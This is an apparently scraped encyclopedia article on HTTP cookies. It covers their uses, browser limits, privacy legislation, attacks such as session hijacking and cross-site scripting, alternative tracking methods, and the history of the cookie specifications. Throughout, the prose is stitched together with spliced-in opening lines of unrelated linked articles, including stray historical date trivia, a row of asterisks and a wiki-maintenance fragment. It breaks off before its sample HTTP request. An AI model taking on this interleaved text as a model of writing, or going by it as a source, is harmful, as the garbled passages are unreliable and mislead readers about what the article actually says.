HTTP cookies, or more commonly referred to as Web cookies, tracking cookies or just cookies, are parcels of text sent by a server to a web client (usually a browser) and then sent back unchanged by the client each time it accesses that server. Hypertext Transfer Protocol ( HTTP) is a Communications protocol for the transfer of information on the Internet. HTTP persistent connections also called HTTP keep-alive or HTTP connection reuse is the idea of using the same TCP connection to send and receive multiple HTTP requests responses as HTTP compression is a capability built into both Web servers and Web browsers to make better use of available bandwidth HTTP Headers form the core of an HTTP request and are very important in an HTTP response An ETag (entity tag is an HTTP response header returned by an HTTP/1 The referer, or HTTP referer, identifies from the point of view of an Internet Webpage or resource the address of the webpage (commonly the URL The following is a list of HTTP response status codes and standard associated phrases intended to give a short textual description of the status The HTTP response status code 200 OK is used to represent a successful response from the server as defined in RFC 2616 The HTTP response status code 301 Moved Permanently is used for permanent redirection The HTTP response status code 302 Found is the most common way of performing a redirection The 403 Forbidden HTTP status code indicates that the client was able to communicate with the server but the server doesn't let the user access what was requested The 404 or Not Found Error message is an HTTP standard response code indicating that the client was able to communicate with the server The term web server can mean one of two things A Computer program that is responsible for accepting HTTP requests from web clients which are The World Wide Web (commonly shortened to the Web) is a system of interlinked Hypertext documents accessed via the Internet. A client is an application or system that accesses a remote service on another Computer system, known as a server, by way of a Network. A web browser is a software application which enables a user to display and interact with text images videos music games and other information typically located on a HTTP cookies are used for authenticating, session tracking (state maintenance), and maintaining specific information about users, such as site preferences or the contents of their electronic shopping carts. Hypertext Transfer Protocol ( HTTP) is a Communications protocol for the transfer of information on the Internet. Authentication (from Greek αυθεντικός real or genuine from authentes author is the act of establishing or confirming something (or someone as Shopping cart software is software used in e-commerce to assist people making purchases online analogous to the American English term ' Shopping cart ' The term "cookie" is derived from "magic cookie," a well-known concept in UNIX computing which inspired both the idea and the name of HTTP cookies. A magic cookie or just cookie for short is a token or short packet of data passed between communicating programs where the data is typically not meaningful to the recipient Unix (officially trademarked as UNIX, sometimes also written as Unix with Small caps) is a computer

Cookies have been of concern for Internet privacy, since they can be used for tracking browsing behavior. Internet privacy consists of Privacy over the media of the Internet: the ability to control what information one reveals about oneself over the Internet and to control As a result, they have been subject to legislation in various countries such as the United States and in the European Union. The United States of America —commonly referred to as the The European Union ( EU) is a political and economic union of twenty-seven member states, located primarily in Cookies have also been criticized because the identification of users they provide is not always accurate and because they could potentially be a target of network attackers. Some alternatives to cookies exist, but each has its own uses, advantages and drawbacks.

Cookies are also subject to a number of misconceptions, mostly based on the erroneous notion that they are computer programs. Computer programs (also software programs, or just programs) are instructions for a Computer. In fact, cookies are simple pieces of data unable to perform any operation by themselves. In particular, they are neither spyware nor viruses, despite the detection of cookies from certain sites by many anti-spyware products. Such content will be deleted Specific software is to be mentioned in this article only A computer virus is a Computer program that can copy itself and infect a computer without permission or knowledge of the user

Most modern browsers allow users to decide whether to accept cookies, but rejection makes some websites unusable. A website (alternatively web site or Web site, a back-construction from the Proper noun World Wide Web) is a collection of Web pages For example, shopping carts implemented using cookies do not work if cookies are rejected.

Purpose

HTTP cookies are used by Web servers to differentiate users and to maintain data related to the user during navigation, possibly across multiple visits. HTTP cookies were introduced to provide a way for realizing a "shopping cart" (or "shopping basket"),^[1][2] a virtual device into which the user can "place" items to purchase, so that users can navigate a site where items are shown, adding or removing items from the shopping basket at any time. Shopping cart software is software used in e-commerce to assist people making purchases online analogous to the American English term ' Shopping cart '

Allowing users to log in to a website is another use of cookies. Users typically log in by inserting their credentials into a login page; cookies allow the server to know that the user is already authenticated, and therefore is allowed to access services or perform operations that are restricted to logged-in users.

Many websites also use cookies for personalization based on users' preferences. Sites that require authentication often use this feature, although it is also present on sites not requiring authentication. Personalization includes presentation and functionality. For example, the Wikipedia Web site allows authenticated users to choose the webpage skin they like best; the Google search engine allows users (even non-registered ones) to decide how many search results per page they want to see. ***************************************************************************************** * * In Computing, skins may be associated with themes as custom graphical appearances ( GUIs) that can be applied to certain software and Google Inc is an American public corporation, earning revenue from advertising related to its Internet search, e-mail, online

Cookies are also used to track users across a website. Third-party cookies and Web bugs, explained below, also allow for tracking across multiple sites. A Web bug is an object that is embedded in a Web page or E-mail and is usually invisible to the user but allows checking that a user has viewed the page or e-mail Tracking within a site is typically done with the aim of producing usage statistics, while tracking across sites is typically used by advertising companies to produce anonymous user profiles, which are then used to target advertising (deciding which advertising image to show) based on the user profile.

Realization

A possible interaction between a Web browser and a server holding a Web page, in which the server sends a cookie to the browser and the browser sends it back when requesting another page.

Technically, cookies are arbitrary pieces of data chosen by the Web server and sent to the browser. The term web server can mean one of two things A Computer program that is responsible for accepting HTTP requests from web clients which are The browser returns them unchanged to the server, introducing a state (memory of previous events) into otherwise stateless HTTP transactions. In Computer science and Automata theory, a state is a unique configuration of information in a program or machine Without cookies, each retrieval of a Web page or component of a Web page is an isolated event, mostly unrelated to all other views of the pages of the same site. A web page or webpage is a resource of information that is suitable for the World Wide Web and can be accessed through a Web browser. By returning a cookie to a web server, the browser provides the server a means of connecting the current page view with prior page views. Other than being set by a web server, cookies can also be set by a script in a language such as JavaScript, if supported and enabled by the Web browser. "Scripting" redirects here For other uses see Script. JavaScript is a Scripting language most often used for Client-side web development

Cookie specifications^[3][4] suggest that browsers should support a minimal number of cookies or amount of memory for storing them. In particular, an internet browser is expected to be able to store at least 300 cookies of four kilobytes each, and at least 20 cookies per server or domain. A kilobyte (derived from the SI prefix Kilo -, meaning 1000 is a unit of Information or Computer storage equal to either 1024 In Computer networking, a domain name is a name given to a collection of network devices that belong to a domain which is an administrative space managed according

Relevant count of maximum stored cookies per domain for the major browsers are:

• Firefox 1. 5: 50
• Firefox 2. 0: 50
• Opera 9: 30
• Internet Explorer 6: 20 (raised to 50 in update on 14 August 2007)
• Internet Explorer 7: 20 (raised to 50 in update on 14 August 2007)

In practice cookies must be smaller than 4 kilobytes. Events 1183 - Taira no Munemori and the Taira clan take the young Emperor Antoku and the three sacred treasures Year 2007 ( MMVII) was a Common year starting on Monday of the Gregorian calendar in the 21st century. Events 1183 - Taira no Munemori and the Taira clan take the young Emperor Antoku and the three sacred treasures Year 2007 ( MMVII) was a Common year starting on Monday of the Gregorian calendar in the 21st century. Internet Explorer imposes a 4KB total for all cookies stored in a given domain.

Cookie names are case insensitive according to section 3. 1 of RFC 2965

The cookie setter can specify a deletion date, in which case the cookie will be removed on that date. If the cookie setter does not specify a date, the cookie is removed once the user quits his or her browser. As a result, specifying a date is a way for making a cookie survive across sessions. For this reason, cookies with an expiration date are called persistent. As an example application, a shopping site can use persistent cookies to store the items users have placed in their basket. This way, if users quit their browser without making a purchase and return later, they still find the same items in the basket so they do not have to look for these items again. If these cookies were not given an expiration date, they would expire when the browser is closed, and the information about the basket content would be lost.

Cookies can also be limited in scope to a specific domain, subdomain or path on the web server which created them.

Misconceptions

Since their introduction on the Internet, misconceptions about cookies have circulated on the Internet and in the media. ^[5][6] In 1998, CIAC, a computer incident response team of the United States Department of Energy, found the security vulnerability "essentially nonexistent" and explained that "information about where you come from and what web pages you visit already exists in a web server's log files". Computer Incident Advisory Capability (CIAC is a service run by the Office of Cyber Security at the Department of Energy. The United States Department of Energy ( DOE) is a Cabinet -level department of the United States government responsible for energy policy ^[7] In 2005, Jupiter Research published the results of a survey,^[8] according to which a consistent percentage of respondents believed some of the following false claims:

• Cookies are like worms and viruses in that they can erase data from the user's hard disks
• Cookies generate popups
• Cookies are used for spamming
• Cookies are only used for advertising

Cookies are in fact only data, not program code: they cannot erase or read information from the user's computer. Jupitermedia Inc, is a US -based corporation established in 1994, and headquartered in Darien CT A computer worm is a self-replicating Computer program. It uses a network to send copies of itself to other nodes (computer terminals on the network and it may do so without A computer virus is a Computer program that can copy itself and infect a computer without permission or knowledge of the user Pop-up ads or popups are a form of online advertising on the World Wide Web intended to attract Web traffic or capture email addresses Spamming is the abuse of electronic messaging systems to indiscriminately send unsolicited bulk messages Advertising is a form of Communication that typically attempts to persuade potential Customers to Purchase or to consume more of a particular Brand ^[9] However, cookies allow for detecting the Web pages viewed by a user on a given site or set of sites. This information can be collected in a profile of the user. Such profiles are often anonymous, that is, they do not contain personal information of the user (name, address, etc. ) More precisely, they cannot contain personal information unless the user has made it available to some sites. Even if anonymous, these profiles have been the subject of some privacy concerns.

According to the same survey, a large percentage of Internet users do not know how to delete cookies.

Browser settings

Most modern browsers support cookies. However, a user can usually also choose whether cookies should be used or not. The following are common options:^[10]

1. To enable or disable cookies completely, so that they are always accepted or always blocked.
2. To prompt users for individual cookies and remembering their answers.
3. To distinguish between first-party and third-party cookies and treat each group accordingly (i. e. to restrict or deny third-party cookies but allow first-party cookies. )
4. To treat cookies based on a whitelist or a blacklist, updated by user or the browser manufacturer (i. A whitelist is a list of accepted items or persons in a set This list is inclusionary confirming that the item being analyzed is acceptable In Computing, a blacklist is a basic Access control mechanism that allows every access except for the members of the black list (i e. restrict or block cookies from blacklisted sites. )
5. To put a reasonable cap on the expiry date and time of cookies.
6. To treat cookies based on their P3P privacy policies if they have any. The Platform for Privacy Preferences Project, or P3P, is a protocol allowing Websites to declare their intended use of information they collect about browsing

The browser may include the possibility of better specifying which cookies have to be accepted or not. In particular, the user can typically choose one or more of the following options: reject cookies from specific domains; disallow third-party cookies (see below); accept cookies as non-persistent (expiring when the browser is closed); and allow a server to set cookies for a different domain. Additionally, browsers may also allow users to view and delete individual cookies.

Most browsers supporting JavaScript allow the user to see the cookies that are active with respect to a given page by typing javascript:alert("Cookies: "+document. cookie) in the browser URL field. Uniform Resource Locator is an URI which also specifies where the identified resource is available and the protocol for retrieving it Some browsers incorporate a cookie manager for the user to see and selectively delete the cookies currently stored in the browser.

Privacy and third-party cookies

Cookies have some important implications on the privacy and anonymity of Web users. Privacy is the ability of an individual or group to seclude themselves or information about themselves and thereby reveal themselves selectively Anonymity is derived from the Greek word ανωνυμία, meaning "without a Name " or "namelessness" While cookies are only sent to the server setting them or one in the same Internet domain, a Web page may contain images or other components stored on servers in other domains. In Computer networking, a domain name is a name given to a collection of network devices that belong to a domain which is an administrative space managed according Cookies that are set during retrieval of these components are called third-party cookies.

In this fictional example, an advertising company has placed banners in two Web sites (which do not show any banner in reality). Hosting the banner images on its servers and using third-party cookies, the advertising company is able to track the browsing of users across these two sites.

Advertising companies use third-party cookies to track a user across multiple sites. In particular, an advertising company can track a user across all pages where it has placed advertising images or web bugs. A Web bug is an object that is embedded in a Web page or E-mail and is usually invisible to the user but allows checking that a user has viewed the page or e-mail Knowledge of the pages visited by a user allows the advertisement company to target advertisement to the user's presumed preferences.

The possibility of building a profile of users has been considered by some a potential privacy threat, even when the tracking is done on a single domain but especially when tracking is done across multiple domains using third-party cookies. For this reason, some countries have legislation about cookies.

The United States government has set strict rules on setting cookies in 2000 after it was disclosed that the White House drug policy office used cookies to track computer users viewing its online anti-drug advertising. The United States of America —commonly referred to as the The White House Office of National Drug Control Policy (ONDCP, a Cabinet level component of the Executive Office of the President of the United States, was established in 1988 In 2002, privacy activist Daniel Brandt found that the CIA had been leaving persistent cookies on computers for ten years. near as long as it used to be several months ago It has been actively summarized and split into sub-articles and there is a dynamic talk page discussion of all When notified it was violating policy, CIA stated that these cookies were not intentionally set and stopped setting them. ^[11] On December 25, 2005, Brandt discovered that the National Security Agency had been leaving two persistent cookies on visitors' computers due to a software upgrade. Events 274 - Roman Emperor Aurelian Year 2005 ( MMV) was a Common year starting on Saturday (link displays full calendar of the Gregorian calendar. The National Security Agency/ Central Security Service ( NSA/CSS) is a cryptologic intelligence agency of the United States government After being informed, the National Security Agency immediately disabled the cookies. ^[12]

The 2002 European Union telecommunication privacy Directive contains rules about the use of cookies. In particular, Article 5, Paragraph 3 of this directive mandates that storing data (like cookies) in a user's computer can only be done if: 1) the user is provided information about how this data is used; and 2) the user is given the possibility of denying this storing operation. However, this article also states that storing data that is necessary for technical reasons is exempted from this rule. This directive was expected to have been applied since October 2003, but a December 2004 report says (page 38) that this provision was not applied in practice, and that some member countries (Slovakia, Latvia, Greece, Belgium, and Luxembourg) did not even implement the provision in national law. Slovakia (long form Slovak Republic; Slovak:, long form, is a Landlocked country in Central Europe with a population of over five million Latvia ( Latvija officially the Republic of Latvia (Latvijas Republika is a Country in Northern Europe in the Baltic region. Greece (Ελλάδα transliterated: Elláda, historically, Ellás,) officially the Hellenic Republic (Ελληνική Δημοκρατία The Kingdom of Belgium is a Country in northwest Europe. It is a founding member of the European Union and hosts its headquarters as well as those Luxembourg (Groussherzogtum Lëtzebuerg Grand-Duché de Luxembourg Großherzogtum Luxemburg is a small Landlocked country in Western Europe, bordered by The same report suggests a thorough analysis of the situation in the Member States.

The P3P specification includes the possibility for a server to state a privacy policy, which specifies which kind of information it collects and for which purpose. The Platform for Privacy Preferences Project, or P3P, is a protocol allowing Websites to declare their intended use of information they collect about browsing These policies include (but are not limited to) the use of information gathered using cookies. According to the P3P specification, a browser can accept or reject cookies by comparing the privacy policy with the stored user preferences or ask the user, presenting them the privacy policy as declared by the server.

Many web browsers including Apple's Safari and Microsoft Internet Explorer versions 6 and 7 support P3P which allows the web browser to determine whether to allow 3rd party cookies to be stored. The Opera web browser allows users to refuse third-party cookies and to create global and specific security profiles for Internet domains. ^[13] Firefox 2. x dropped this option from its menu system but is expected to restore it with the release of version 3. x.

Drawbacks of cookies

Besides privacy concerns, cookies also have some technical drawbacks. In particular, they do not always accurately identify users, they can be used for security attacks, and they are at odds with the Representational State Transfer (REST) software architectural style.

Inaccurate identification

If more than one browser is used on a computer, each usually has a separate storage area for cookies. Hence cookies do not identify a person, but a combination of a user account, a computer, and a Web browser. Thus, anyone who uses multiple accounts, computers, or browsers has multiple sets of cookies.

Likewise, cookies do not differentiate between multiple users who share a computer and browser, if they do not use different user accounts. Users in a Computing context refers to one who uses a computer system

Cookie hijacking

A cookie can be stolen by another computer that is allowed reading from the network

During normal operation cookies are sent back and forth between a server (or a group of servers in the same domain) and the computer of the browsing user. Since cookies may contain sensitive information (user name, a token used for authentication, etc. Authentication (from Greek αυθεντικός real or genuine from authentes author is the act of establishing or confirming something (or someone as ), their values should not be accessible to other computers. Cookie theft is the act of intercepting cookies by an unauthorized party.

Cookies can be stolen via packet sniffing in an attack called session hijacking. The term session hijacking refers to the exploitation of a valid computer session - sometimes also called a session key - to gain unauthorized access to information Traffic on a network can be intercepted and read by computers on the network other than its sender and its receiver, (particularly on unencrypted public Wi-Fi networks. In Cryptography, plaintext is the information which the sender wishes to transmit to the receiver(s Wi-Fi (ˈwaɪfaɪ is the trade name for the popular wireless technology used ) This traffic includes cookies sent on ordinary unencrypted http sessions. Hypertext Transfer Protocol ( HTTP) is a Communications protocol for the transfer of information on the Internet. Where network traffic is not encrypted, malicious users can therefore read the communications of other users on the network, including their cookies, using programs called packet sniffers.

This issue can be overcome by securing the communication between the user's computer and the server by employing Transport Layer Security (https protocol) to encrypt the connection. Transport Layer Security ( TLS) and its predecessor Secure Sockets Layer ( SSL) are Cryptographic protocols that provide secure A server can specify the secure flag while setting a cookie; the browser will then send it only over a secure channel, such as an SSL connection. Transport Layer Security ( TLS) and its predecessor Secure Sockets Layer ( SSL) are Cryptographic protocols that provide secure ^[14]

However a large number of websites, although using secure https communication for user authentication (i. Authentication (from Greek αυθεντικός real or genuine from authentes author is the act of establishing or confirming something (or someone as e. the login page), subsequently send session cookies and other data over ordinary unencrypted http connections for performance reasons. In Cryptography, plaintext is the information which the sender wishes to transmit to the receiver(s Hypertext Transfer Protocol ( HTTP) is a Communications protocol for the transfer of information on the Internet. Hackers can therefore easily intercept the cookies of other users and impersonate them on the relevant websites. ^[15]

Cross-site scripting: a cookie that should be only exchanged between a server and a client is sent to another party.

A different way to steal cookies is cross-site scripting and making the browser itself send cookies to servers that should not receive them. Cross-site scripting ( XSS) is a type of computer security vulnerability typically found in Web applications which allow Code injection Modern browsers allow execution of pieces of code retrieved from the server. If cookies are accessible during execution, their value may be communicated in some form to servers that should not access them. Encrypting cookies before sending them on the network does not help against this attack. ^[16]

This type of cross-site scripting is typically exploited by attackers on sites that allow users to post HTML content. HTML, an initialism of HyperText Markup Language, is the predominant Markup language for Web pages It provides a means to describe the structure By embedding a suitable piece of code in an HTML post, an attacker may receive cookies of other users. Knowledge of these cookies can then be exploited by connecting to the same site using the stolen cookies, thus being recognised as the user whose cookies have been stolen.

A way for preventing such attacks is by the HttpOnly flag;^[17] this is a Microsoft option that makes a cookie inaccessible to client side script. However, web developers should consider developing their websites so that they are immune to cross-site scripting. A web developer is a Software developer or Software engineer who is specifically engaged in the development of World Wide Web applications or distributed ^[18]

Cookie poisoning: an attacker sends a server an invalid cookie, possibly modifying a valid cookie it previously received from the server.

Cookie poisoning

While cookies are supposed to be stored and sent back to the server unchanged, an attacker may modify the value of cookies before sending them back to the server. If, for example, a cookie contains the total value a user has to pay for the items in their shopping basket, changing this value exposes the server to the risk of making the attacker pay less than the supposed price. The process of tampering with the value of cookies is called cookie poisoning, and is sometimes used after cookie theft to make an attack persistent.

In cross-site cooking, the attacker exploits a browser bug to send an invalid cookie to a server.

Most websites, however, only store a session identifier — a randomly generated unique number used to identify the user's session — in the cookie itself, while all the other information is stored on the server. In this case, the problem of cookie poisoning is largely eliminated.

Cross-site cooking

Each site is supposed to have its own cookies, so a site like example.com should not be able to alter or set cookies for another site, like example.org. examplecom, examplenet, and exampleorg are second-level Domain names reserved by the Internet Engineering Task Force through RFC examplecom, examplenet, and exampleorg are second-level Domain names reserved by the Internet Engineering Task Force through RFC Cross-site cooking vulnerabilities in web browsers allow malicious sites to break this rule. Cross-site cooking is a type of Browser exploit which allows a site attacker to set a cookie for a browser into the This is similar to cookie poisoning, but the attacker exploits non-malicious users with vulnerable browsers, instead of attacking the actual site directly. The goal of such attacks may be to perform session fixation. Session fixation attacks attempt to exploit the vulnerability of a system which allows one person to fixate (set another person's session identifier (SID

Users are advised to use the more recent versions of web browsers in which such issue is mitigated.

Inconsistent state on client and server

The use of cookies may generate an inconsistency between the state of the client and the state as stored in the cookie. If the user acquires a cookie and then clicks the "Back" button of the browser, the state on the browser is generally not the same as before that acquisition. As an example, if the shopping cart of an online shop is realized using cookies, the content of the cart may not change when the user goes back in the browser's history: if the user presses a button to add an item in the shopping cart and then clicks on the "Back" button, the item remains in the shopping cart. This might not be the intention of the user, who possibly wanted to undo the addition of the item. This can lead to unreliability, confusion and bugs. Web developers should therefore be aware of this issue and implement measures to handle such situation as fits.

Cookie expiration

Persistent cookies have been criticized by privacy experts for not being set to expire soon enough, and thereby allowing some websites to track users and build up a profile of them over time. ^[19] This aspect of cookies also compounds the issue of session hijacking, because a stolen persistent cookie can potentially be used to impersonate a user for a considerable period of time. The term session hijacking refers to the exploitation of a valid computer session - sometimes also called a session key - to gain unauthorized access to information

Alternatives to cookies

Some of the operations that can be realised using cookies can also be realised using other mechanisms. However, these alternatives to cookies have their own drawbacks, which make cookies usually preferred to them in practice. Most of the following alternatives allow for user tracking, even if not as reliably as cookies. As a result, privacy is an issue even if cookies are rejected by the browser or not set by the server.

IP address

An unreliable technique for tracking users is based on storing the IP addresses of the computers requesting the pages. An Internet Protocol ( IP) address is a numerical identification ( Logical address) that is assigned to devices participating in a Computer network This technique has been available since the introduction of the World Wide Web, as downloading pages requires the server holding them to know the IP address of the computer running the browser or the proxy, if any is used. In Computer networks a proxy server is a server (a computer system or an application program which services the requests of its clients by forwarding This information is available for the server to be stored regardless of whether cookies are used or not.

However, these addresses are typically less reliable in identifying a user than cookies because computers and proxies may be shared by several users, and the same computer may be assigned different Internet addresses in different work sessions (this is often the case for dial-up connections). Dial-up Internet Access is a form of Internet access via Telephone lines The user's computer or Router uses an attached Modem connected to a The reliability of this technique can be improved by using another feature of the HTTP protocol: when a browser requests a page because the user has followed a link, the request that is sent to the server contains the URL of the page where the link is located. If the server stores these URLs, the path of page viewed by the user can be tracked more precisely. However, these traces are less reliable than the ones provided by cookies, as several users may access the same page from the same computer, NAT router, or proxy and then follow two different links. In Computer networking network address translation (NAT is the process of modifying Network address information in datagram packet headers while in transit across Moreover, this technique only allows tracking and cannot replace cookies in their other uses.

Tracking by IP address can be impossible with some systems that are used to retain Internet anonymity, such as Tor. Anonymity is derived from the Greek word ανωνυμία, meaning "without a Name " or "namelessness" Tor ( The Onion Router) is a Free software implementation of second-generation Onion routing – a system enabling its users to communicate anonymously With such systems, not only could one browser carry multiple addresses throughout a session, but multiple users could appear to be coming from the same IP address, thus making IP address use for tracking wholly unreliable.

Some major ISPs, including AOL, route all web traffic through a small number of proxies which makes this scheme particularly unworkable.

URL (query string)

A more precise technique is based on embedding information into URLs. The query string part of the URL is the one that is typically used for this purpose, but other parts can be used as well. In the World Wide Web, a query string is the part of a URL that contains data to be passed to web applications such as CGI programs Uniform Resource Locator is an URI which also specifies where the identified resource is available and the protocol for retrieving it The Java Servlet and PHP session mechanisms both use this method if cookies are not enabled. The Java Servlet API allows a Software developer to add dynamic content to a Web server using the Java platform. PHP is a computer Scripting language. Originally designed for producing Dynamic web pages it has evolved to include a Command line interface capability

This method consists of the Web server appending query strings to the links of a Web page it holds when sending it to a browser. When the user follows a link, the browser returns the attached query string to the server.

Query strings used in this way and cookies are very similar, both being arbitrary pieces of information chosen by the server and sent back by the browser. However, there are some differences: since a query string is part of a URL, if that URL is later reused, the same attached piece of information is sent to the server. For example, if the preferences of a user are encoded in the query string of a URL and the user sends this URL to another user by e-mail, those preferences will be used for that other user as well. Electronic mail, often abbreviated to e-mail, email, or originally eMail, is a Store-and-forward method of writing sending receiving

Moreover, even if the same user accesses the same page two times, there is no guarantee that the same query string is used in both views. For example, if the same user arrives to the same page but coming from a page internal to the site the first time and from an external search engine the second time, the relative query strings are typically different while the cookies would be the same. For more details, see query string. In the World Wide Web, a query string is the part of a URL that contains data to be passed to web applications such as CGI programs

Other drawbacks of query strings are related to security: storing data that identifies a session in a query string enables or simplifies session fixation attacks, referer logging attacks and other security exploits. Session fixation attacks attempt to exploit the vulnerability of a system which allows one person to fixate (set another person's session identifier (SID The referer, or HTTP referer, identifies from the point of view of an Internet Webpage or resource the address of the webpage (commonly the URL An exploit (from the same word in the French language, meaning "achievement" or "accomplishment" is a piece of Software, a chunk of data or Transferring session identifiers as HTTP cookies is more secure.

Hidden form fields

A form of session tracking, used by ASP.NET, is to use web forms with hidden fields. ASPNET is a Web application framework developed and marketed by Microsoft, that Programmers can use to build dynamic Web sites Web applications A webform on a Web page allows a user to enter data that is typically sent to a server for processing and to mimic the usage of paper forms. This technique is very similar to using URL query strings to hold the information and has many of the same advantages and drawbacks; and if the form is handled with the HTTP GET method, the fields actually become part of the URL the browser will send upon form submission. Hypertext Transfer Protocol ( HTTP) is a Communications protocol for the transfer of information on the Internet. But most forms are handled with HTTP POST, which causes the form information, including the hidden fields, to be appended as extra input that is neither part of the URL, nor of a cookie.

This approach presents two advantages from the point of view of the tracker: first, having the tracking information placed in the HTML source and POST input rather than in the URL means it will not be noticed by the average user; second, the session information is not copied when the user copies the URL (to save the page on disk or send it via email, for example). A drawback of this technique is that session information is in the HTML code; therefore, each web page must be generated dynamically each time someone requests it, placing an additional workload on the web server.

window. name

All current web browsers can store a fairly large amount of data (2-32 MB) via JavaScript using the DOM property window. name. This data can be used instead of session cookies and is also cross domain. The technique can be coupled with JSON/JavaScript objects to store complex sets of session variables on the client side. JSON (ˈdʒeɪsɒn ie "Jason" short for JavaScript Object Notation, is a lightweight Computer data interchange format

The downside is that every separate window or tab will initially have an empty window. In the area of Graphical user interfaces a tabbed document interface ( TDI) is one that allows multiple Documents to be contained within a single window name; in times of tabbed browsing this means that individually opened tabs (initiation by user) will not have a window name. In the area of Graphical user interfaces a tabbed document interface ( TDI) is one that allows multiple Documents to be contained within a single window Furthermore window. name can be used for tracking visitors across different web sites, making it of concern for Internet privacy. Internet privacy consists of Privacy over the media of the Internet: the ability to control what information one reveals about oneself over the Internet and to control

HTTP authentication

As for authentication, the HTTP protocol includes the basic access authentication and the digest access authentication protocols, which allow access to a Web page only when the user has provided the correct username and password. In the context of an HTTP transaction the basic access authentication is a method designed to allow a Web browser, or other client program to provide credentials HTTP Digest access authentication is one of the agreed methods a web server can use to negotiate credentials with a web user (using the HTTP protocol If the server requires such credential for granting access to a Web page, the browser requests them to the user; once obtained, the browser stores and uses them also for accessing subsequent pages, without requiring the user to provide them again. From the point of view of the user, the effect is the same as if cookies were used: username and password are only requested once, and from that point on the user is given access to the site. In the basic access authentication protocol, a combination of username and password is sent to the server in every browser request. This means that someone listening in on this traffic can simply read this information and store for later use. This problem is overcome in the digest access authentication protocol, in which the username and password are encrypted using a random nonce created by the server. In Security engineering, a nonce stands for number used once (it is similar in spirit to a Nonce word)

Macromedia Flash Local Stored Objects

If a browser includes the Macromedia Flash Player plugin, the Local Shared Objects functionality can be used in a way very similar to cookies. Adobe Flash (previously called Shockwave Flash and Macromedia Flash) is a set of Multimedia software created by Macromedia and currently A Local Shared Object (LSO is a collection of cookie -like data stored as a file on a user's PC Local Stored Objects may be an attractive choice to web developers because a majority of Windows users have Flash Player installed, the default size limit is 100 kB, and the security controls are distinct from the user controls for cookies, so Local Shared Objects may be enabled when cookies are not. Microsoft Windows is a series of Software Operating systems and Graphical user interfaces produced by Microsoft.

The major drawback with this approach is the same as every platform/vendor-specific approach: it breaks the web's global accessibility and interoperability, tying up web development to a specific client's platform, excluding users who use standards-compliant web user agents and instead forcing them to use platform/vendor-specific web agents, which propitiates vendor lock-in. Web accessibility refers to the practice of making Websites usable by people of all abilities and Disabilities. Web interoperability means producing web pages viewable in standard compatible Web browsers various Operating systems such as Windows, Macintosh Web standards is a general term for the formal standards and other technical Specifications that define and describe aspects of the World Wide Web. A user agent is the client application used with a particular Network protocol; the phrase is most commonly used in reference to those which access the World In Economics, vendor lock-in, also known as proprietary lock-in, or customer lock-in, makes a customer dependent on a vendor for products

Client-side persistence

Some web browsers support a script-based persistence mechanism that allows the page to store information locally for later retrieval. Internet Explorer, for example, supports persisting information in the browser's history, in favorites, in an XML store, or directly within a Web page saved to disk. ^[20]

A different mechanism relies on browsers normally caching (holding in memory instead of reloading) JavaScript programs used in web pages. As an example, a page may contain a link such as <script type="text/javascript" src="example. js">. The first time this page is loaded, the program example. js is loaded as well. At this point, the program remains cached and is not reloaded the second time the page is visited. As a result, if this program contains a statement such as id=3243242, this identifier remains valid and can be exploited by other JavaScript code the next times the page is loaded, or another page linking the same program is loaded. ^[21]

History

The term "HTTP cookie" derives from "magic cookie", a packet of data a program receives but only uses for sending it again, possibly to its origin, unchanged. A magic cookie or just cookie for short is a token or short packet of data passed between communicating programs where the data is typically not meaningful to the recipient Magic cookies were already used in computing when Lou Montulli had the idea of using them in Web communications in June 1994. Louis J Montulli II (best known as Lou Montulli) is a programmer who is well known for his work in producing Web browsers In 1991 he wrote a text web browser ^[22] At the time, he was an employee of Netscape Communications, which was developing an e-commerce application for a customer. Netscape Communications (formerly known as Netscape Communications Corporation and commonly known as Netscape) is an American computer services company Electronic commerce, commonly known as e-commerce' or eCommerce, consists of the buying and selling of products or services over electronic Cookies provided a solution to the problem of reliably implementing a virtual shopping cart. Shopping cart software is software used in e-commerce to assist people making purchases online analogous to the American English term ' Shopping cart ' ^[1][2]

Together with John Giannandrea, Montulli wrote the initial Netscape cookie specification the same year. Version 0. 9beta of Mosaic Netscape, released on October 13, 1994^[23][24], supported cookies. Events 54 - Nero ascends to the Roman throne 409 - Vandals and Alans crossed the Pyrenees Year 1994 ( MCMXCIV) was a Common year starting on Saturday (link will display full 1994 Gregorian calendar) The first actual use of cookies (out of the labs) was made for checking whether visitors to the Netscape Web site had already visited the site. Montulli applied for a patent for the cookie technology in 1995; it was granted in 1998. Support for cookies was integrated in Internet Explorer in version 2, released in October 1995. ^[25]

The introduction of cookies was not widely known to the public, at the time. In particular, cookies were accepted by default, and users were not notified of the presence of cookies. Some people were aware of the existence of cookies as early as the first quarter of 1995,^[26] but the general public learned about them after the Financial Times published an article about them on February 12, 1996. The Financial Times ( FT) is a British international business Newspaper. Events 1429 - English Forces under Sir John Fastolf defend a supply convoy carrying rations to the army besieging Orleans from attack by the Year 1996 ( MCMXCVI) was a Leap year starting on Monday (link will display full 1996 Gregorian calendar) In the same year, cookies received lot of media attention, especially because of potential privacy implications. Cookies were discussed in two U.S. Federal Trade Commission hearings in 1996 and 1997. The United States of America —commonly referred to as the The Federal Trade Commission ( FTC) is an independent agency of the United States government, established in 1914 by the Federal Trade Commission Act

The development of the formal cookie specifications was already ongoing. In particular, the first discussions about a formal specification started in April 1995 on the www-talk mailing list. A special working group within the IETF was formed. Two alternative proposals for introducing a state in an HTTP transactions had been proposed by Brian Behlendorf and David Kristol, respectively, but the group, headed by Kristol himself, soon decided to use the Netscape specification as a starting point. On February 1996, the working group identified third-party cookies as a considerable privacy threat. The specification produced by the group was eventually published as RFC 2109 in February 1997. It specifies that third-party cookies were either not allowed at all, or at least not enabled by default.

At this time, advertising companies were already using third-party cookies. The recommendation about third-party cookies of RFC 2109 was not followed by Netscape and Internet Explorer. RFC 2109 was followed by RFC 2965 in October 2000.

Implementation

Setting a cookie

Transfer of Web pages follows the HyperText Transfer Protocol (HTTP). Hypertext Transfer Protocol ( HTTP) is a Communications protocol for the transfer of information on the Internet. Regardless of cookies, browsers request a page from web servers by sending them a short text called HTTP request. Hypertext Transfer Protocol ( HTTP) is a Communications protocol for the transfer of information on the Internet. For example, to access the page http://www. example. org/index. html, browsers connect to the server www. example. org sending it a request that looks like the following one:

The server replies by sending the requested page preceded by a similar packet of text, called HTTP response. Hypertext Transfer Protocol ( HTTP) is a Communications protocol for the transfer of information on the Internet. This packet may contain lines requesting the browser to store cookies:

